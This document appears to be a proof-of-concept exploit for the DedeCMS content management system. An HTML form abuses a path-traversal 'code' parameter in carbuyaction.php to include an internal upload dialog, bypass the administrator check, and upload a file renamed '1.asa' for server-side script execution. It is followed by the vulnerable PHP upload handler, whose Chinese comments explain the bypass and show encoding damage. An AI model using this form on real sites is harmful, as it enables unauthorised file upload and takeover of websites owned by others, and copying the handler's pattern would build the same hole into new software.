<form action="http://localhost:8090/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post" method="post" enctype="multipart/form-data" name="QuickSearch" id="QuickSearch">
<input type="hidden" name="newname" value="1.asa">
<input type="file" name="uploadfile">
<input type="submit" value="搜索" name="QuickSearchBtn">
</form>

<?php
if(!isset($cfg_basedir))
{
include_once(dirname(__FILE__).'/config.php');
}
//config.php 是用于驗(yàn)證是否管理員。由于本地包含， $cfg_basedir 已經(jīng)設(shè)置了值，應(yīng)該跳過(guò)了驗(yàn)證。

//文件名（前為手工指定， 后者自動(dòng)處理）
if(!empty($newname))
{
$filename = $newname;
if(!ereg("\.", $filename)) $fs = explode('.', $uploadfile_name);
else $fs = explode('.', $filename);
if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
{
ShowMsg("你指定的文件名被系統(tǒng)禁止！",'javascript:;');
exit();
}
if(!ereg("\.", $filename)) $filename = $filename.'.'.$fs[count($fs)-1];
}else{
$filename = $cuserLogin->getUserID().'-'.dd2char(MyDate('ymdHis',$nowtme));
$fs = explode('.', $uploadfile_name);
if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
{
ShowMsg("你上傳了某些可能存在不安全因素的文件，系統(tǒng)拒絕操作！",'javascript:;');
exit();
}
$filename = $filename.'.'.$fs[count($fs)-1];
}